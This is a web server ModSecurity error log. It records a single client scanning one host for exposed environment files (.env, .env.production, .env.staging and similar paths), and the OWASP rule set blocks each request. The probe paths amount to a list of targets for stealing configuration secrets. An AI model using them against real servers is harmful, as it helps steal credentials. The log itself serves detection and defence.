[Thu Jan 08 21:18:13.448101 2026] [:error] [pid 1270042] [client 18.119.100.98:34108] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.local"] [unique_id "aWARBS7RlX2cRjHcFz6xyQAAAAY"]
[Thu Jan 08 21:18:13.793894 2026] [:error] [pid 1283304] [client 18.119.100.98:34294] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.staging"] [unique_id "aWARBWAwUIZgFNkik8yVRAAAAAg"]
[Thu Jan 08 21:18:13.794102 2026] [:error] [pid 1283304] [client 18.119.100.98:34294] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.staging"] [unique_id "aWARBWAwUIZgFNkik8yVRAAAAAg"]
[Thu Jan 08 21:18:13.794257 2026] [:error] [pid 1283304] [client 18.119.100.98:34294] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.staging"] [unique_id "aWARBWAwUIZgFNkik8yVRAAAAAg"]
[Thu Jan 08 21:18:14.145015 2026] [:error] [pid 1270036] [client 18.119.100.98:34470] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aWARBuM1154Q6b0hewij7QAAAAE"]
[Thu Jan 08 21:18:14.145223 2026] [:error] [pid 1270036] [client 18.119.100.98:34470] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aWARBuM1154Q6b0hewij7QAAAAE"]
[Thu Jan 08 21:18:14.145383 2026] [:error] [pid 1270036] [client 18.119.100.98:34470] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aWARBuM1154Q6b0hewij7QAAAAE"]
[Thu Jan 08 21:18:14.491913 2026] [:error] [pid 1270037] [client 18.119.100.98:34616] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aWARBuA_IfWyU2EIiRhOjQAAAAI"]
[Thu Jan 08 21:18:14.492126 2026] [:error] [pid 1270037] [client 18.119.100.98:34616] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aWARBuA_IfWyU2EIiRhOjQAAAAI"]
[Thu Jan 08 21:18:14.492281 2026] [:error] [pid 1270037] [client 18.119.100.98:34616] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aWARBuA_IfWyU2EIiRhOjQAAAAI"]
[Thu Jan 08 21:18:14.845317 2026] [:error] [pid 1280390] [client 18.119.100.98:34770] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.staging"] [unique_id "aWARBtKTJIy7S9W5nL2LSAAAAAk"]
[Thu Jan 08 21:18:14.845526 2026] [:error] [pid 1280390] [client 18.119.100.98:34770] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.staging"] [unique_id "aWARBtKTJIy7S9W5nL2LSAAAAAk"]
[Thu Jan 08 21:18:14.845704 2026] [:error] [pid 1280390] [client 18.119.100.98:34770] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.staging"] [unique_id "aWARBtKTJIy7S9W5nL2LSAAAAAk"]
[Thu Jan 08 21:18:15.194406 2026] [:error] [pid 1270038] [client 18.119.100.98:34896] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.local"] [unique_id "aWARBxmwMJtANIcuNUXpLQAAAAM"]
[Thu Jan 08 21:18:15.194617 2026] [:error] [pid 1270038] [client 18.119.100.98:34896] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.local"] [unique_id "aWARBxmwMJtANIcuNUXpLQAAAAM"]
[Thu Jan 08 21:18:15.194780 2026] [:error] [pid 1270038] [client 18.119.100.98:34896] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.local"] [unique_id "aWARBxmwMJtANIcuNUXpLQAAAAM"]
[Thu Jan 08 21:18:15.541452 2026] [:error] [pid 1270039] [client 18.119.100.98:35028] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env"] [unique_id "aWARB5ccQYhM1DUhi_W7EgAAAAQ"]
[Thu Jan 08 21:18:15.541656 2026] [:error] [pid 1270039] [client 18.119.100.98:35028] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env"] [unique_id "aWARB5ccQYhM1DUhi_W7EgAAAAQ"]
[Thu Jan 08 21:18:15.541808 2026] [:error] [pid 1270039] [client 18.119.100.98:35028] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env"] [unique_id "aWARB5ccQYhM1DUhi_W7EgAAAAQ"]
[Thu Jan 08 21:18:15.888866 2026] [:error] [pid 1270043] [client 18.119.100.98:35148] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONTEND/.env"] [unique_id "aWARBwvEr1EpOYnVfM6rzQAAAAc"]
[Thu Jan 08 21:18:15.889073 2026] [:error] [pid 1270043] [client 18.119.100.98:35148] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONTEND/.env"] [unique_id "aWARBwvEr1EpOYnVfM6rzQAAAAc"]
[Thu Jan 08 21:18:15.889240 2026] [:error] [pid 1270043] [client 18.119.100.98:35148] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONTEND/.env"] [unique_id "aWARBwvEr1EpOYnVfM6rzQAAAAc"]
[Thu Jan 08 21:18:16.600201 2026] [:error] [pid 1270041] [client 18.119.100.98:35414] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.production"] [unique_id "aWARCM3GwEx_BV8-CrWUTgAAAAU"]
[Thu Jan 08 21:18:16.600411 2026] [:error] [pid 1270041] [client 18.119.100.98:35414] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.production"] [unique_id "aWARCM3GwEx_BV8-CrWUTgAAAAU"]
[Thu Jan 08 21:18:16.600567 2026] [:error] [pid 1270041] [client 18.119.100.98:35414] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.production"] [unique_id "aWARCM3GwEx_BV8-CrWUTgAAAAU"]
[Thu Jan 08 21:18:16.944823 2026] [:error] [pid 1270042] [client 18.119.100.98:35536] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWARCC7RlX2cRjHcFz6xygAAAAY"]
[Thu Jan 08 21:18:16.945051 2026] [:error] [pid 1270042] [client 18.119.100.98:35536] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWARCC7RlX2cRjHcFz6xygAAAAY"]
[Thu Jan 08 21:18:16.945200 2026] [:error] [pid 1270042] [client 18.119.100.98:35536] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWARCC7RlX2cRjHcFz6xygAAAAY"]
[Thu Jan 08 21:18:17.294431 2026] [:error] [pid 1283304] [client 18.119.100.98:35654] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.staging"] [unique_id "aWARCWAwUIZgFNkik8yVRQAAAAg"]
[Thu Jan 08 21:18:17.294646 2026] [:error] [pid 1283304] [client 18.119.100.98:35654] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.staging"] [unique_id "aWARCWAwUIZgFNkik8yVRQAAAAg"]
[Thu Jan 08 21:18:17.294809 2026] [:error] [pid 1283304] [client 18.119.100.98:35654] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.staging"] [unique_id "aWARCWAwUIZgFNkik8yVRQAAAAg"]
[Thu Jan 08 21:18:17.641043 2026] [:error] [pid 1270036] [client 18.119.100.98:35810] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWARCeM1154Q6b0hewij7gAAAAE"]
[Thu Jan 08 21:18:17.641262 2026] [:error] [pid 1270036] [client 18.119.100.98:35810] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWARCeM1154Q6b0hewij7gAAAAE"]
[Thu Jan 08 21:18:17.641417 2026] [:error] [pid 1270036] [client 18.119.100.98:35810] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWARCeM1154Q6b0hewij7gAAAAE"]
[Thu Jan 08 21:18:17.988623 2026] [:error] [pid 1270037] [client 18.119.100.98:35948] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aWARCeA_IfWyU2EIiRhOjgAAAAI"]
[Thu Jan 08 21:18:17.988886 2026] [:error] [pid 1270037] [client 18.119.100.98:35948] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aWARCeA_IfWyU2EIiRhOjgAAAAI"]
[Thu Jan 08 21:18:17.989047 2026] [:error] [pid 1270037] [client 18.119.100.98:35948] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aWARCeA_IfWyU2EIiRhOjgAAAAI"]
[Thu Jan 08 21:18:18.333565 2026] [:error] [pid 1280390] [client 18.119.100.98:36064] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "aWARCtKTJIy7S9W5nL2LSQAAAAk"]
[Thu Jan 08 21:18:18.334571 2026] [:error] [pid 1280390] [client 18.119.100.98:36064] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "aWARCtKTJIy7S9W5nL2LSQAAAAk"]
[Thu Jan 08 21:18:18.334765 2026] [:error] [pid 1280390] [client 18.119.100.98:36064] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "aWARCtKTJIy7S9W5nL2LSQAAAAk"]
